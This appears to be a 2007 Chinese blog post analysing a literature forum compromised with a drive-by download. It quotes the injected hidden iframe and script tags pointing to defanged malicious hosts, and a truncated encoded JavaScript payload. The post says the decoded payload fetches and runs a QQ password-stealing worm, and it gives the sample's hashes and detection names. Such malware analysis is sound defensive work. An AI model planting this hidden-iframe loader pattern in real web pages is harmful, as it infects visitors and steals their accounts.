文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe

本文记录了一次文学论坛被Worm.Win32.QQPass.a/0.exe恶意软件感染的过程。该恶意软件通过网页中的iframe和js文件下载并执行,最终目标是保存并运行一个名为~tmp.tmp的文件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe

endurer 原创
2007-08-31 第1

检查发现网页中包含代码:
/---
<iframe src="hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907 包含代码:
/---
<script src=hxxp://www.y*oyo*5*9***.com/00.js></script>
1
2
3
<script src=hxxp://www.y*oyo*5*9***.com/11.js></script>
---/

00.js 内容为:
/---
eval("/146/165…(略)…/40/175")
---/

解密后的代码功能为 下载 hxxp://www.*down*8**9.com/0.exe,保存到 %windir%,文件名由自定义函数:
/---
function gn(tnV1) { var kUzRo2 = window["Math"]["random"]()*tnV1; return '.tmp'+'~tmp'; }
---/
生成,即~tmp.tmp,然后用 cmd.exe /c 来运行。

文件说明符 : d:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-31 19:3:13
修改时间 : 2007-8-31 19:3:22
访问时间 : 2007-8-31 0:0:0
大小 : 16944 字节 16.560 KB
MD5 : ceb6f4d04c9f5ff2f6636dd7233460d9
HSA1: 9F48898ECA47463712D65752C4AF0C072F200C8F

Kaspersky 报为 Worm.Win32.QQPass.a,瑞星 报为 Trojan.PSW.Win32.Agent.vcd

11.js 没有什么可疑的东东。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值